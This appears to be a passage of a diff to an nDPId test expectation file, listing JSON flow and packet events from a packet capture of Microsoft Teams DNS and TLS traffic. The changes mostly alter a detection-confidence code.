-00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1797,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1587041685136,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.250.123"}} +00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1797,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1587041685136,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.250.123"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685171,"flow_last_seen":1587041685171,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041685171,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1587041685171,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685171,"pkt":"EBMx8Tl2KDc3AG3ICABFAABADGUAAP8RK\/DAqAEGwKgBAeRZADUALJr8l0UBAAABAAAAAAAAB291dGxvb2sGb2ZmaWNlA2NvbQAAAQAB"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685171,"flow_last_seen":1587041685171,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041685171,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1798,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685171,"flow_last_seen":1587041685171,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041685171,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1587041685185,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1587041685185,"pkt":"KDc3AG3IEBMx8Tl2CABFAADeqaxAADkRFAvAqAEBwKgBBgA15FkAygAAl0WBgAABAAYAAAAAB291dGxvb2sGb2ZmaWNlA2NvbQAAAQABwAwABQABAAAANQAMCXN1YnN0cmF0ZcAUwDAABQABAAAAxQAUCXN1YnN0cmF0ZQdtcy1hY2RjwBTASAAFAAEAAAAmAAgFYWZkLWvAFMBoAAUAAQAAACYAKBJvdXRsb29rLW9mZmljZS1jb20Gay0wMDAyCGstbXNlZGdlA25ldADAfAAFAAEAAACgAALAj8CPAAEAAQAAAJ8ABA1rEgs="} 
-00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041685185,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}} +00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1799,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041685185,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"outlook.office.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.18.11"}} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685232,"flow_last_seen":1587041685232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685232,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1587041685232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685232,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyIAbtyjZOTAAAAALAC\/\/8ViAAAAgQFtAEDAwUBAQgKMIS5SgAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685240,"flow_last_seen":1587041685240,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685240,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1587041685240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685240,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyKAbtGGzTNAAAAALAC\/\/8rVAAAAgQFtAEDAwUBAQgKMIS5UgAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1587041685243,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1587041685243,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPU3QAAP8R5NHAqAEGwKgBAchtADUAO5eNyGMBAAABAAAAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAHAAB"} 
-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685248,"flow_last_seen":1587041685248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1587041685248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685248,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyLAbsws\/klAAAAALAC\/\/\/xvAAAAgQFtAEDAwUBAQgKMIS5WgAAAAAEAgAA"} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685251,"flow_last_seen":1587041685251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685251,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1587041685251,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685251,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4XAqAEGKH4JB+yMAbvF6IfFAAAAALAC\/\/8d8gAAAgQFtAEDAwUBAQgKMIS5XQAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1587041685253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685253,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0w5JAAHUGiY00ccKEwKgBBgG77IqoHlkCRhs0zoAS\/\/9MIAAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1811,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1587041685253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685253,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyKAbtGGzTOqB5ZA1AQIABs3wAA"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1812,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685240,"flow_last_seen":1587041685253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041685253,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": 
{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1812,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685240,"flow_last_seen":1587041685253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041685253,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1587041685256,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1587041685256,"pkt":"KDc3AG3IEBMx8Tl2CABFAACb\/nFAADkRv4jAqAEBwKgBBgA1yG0AhwAAyGOBgAABAAAAAQAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAHAABwCEABgABAAAADgBABHByZDEOYXp1cmVkbnMtY2xvdWTAKgZtc25oc3QJbWljcm9zb2Z0A2NvbQB9o\/w8AAADhAAAASwACTqAAAAAPA=="} 
-00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041685256,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041685256,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1814,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1587041685261,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685261,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0jN1AAG0Ge5k0cg8twKgBBgG77IfA1AaRAv0Ol4AS\/\/+iigAAAgQFoAEDAwgBAQQC"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1815,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1587041685261,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685261,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGNYPAqAEGNHIPLeyHAbsC\/Q6XwNQGklAQIADDSQAA"} -00990{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1816,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685106,"flow_last_seen":1587041685262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041685262,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1824,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685240,"flow_last_seen":1587041685269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6122,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1587041685269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} +00990{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1816,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685106,"flow_last_seen":1587041685262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041685262,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1824,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685240,"flow_last_seen":1587041685269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6122,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1587041685269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1828,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1587041685278,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685278,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8aa1AAGwGYc00ck0hwKgBBgG77IgacWa+co2TlKASIABIJQAAAgQFoAEDAwgEAggKYR7cGTCEuUo="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1829,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1587041685278,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685278,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyIAbtyjZOUGnFmv4AQEAmGrAAAAQEICjCEuXNhHtwZ"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1830,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685232,"flow_last_seen":1587041685278,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 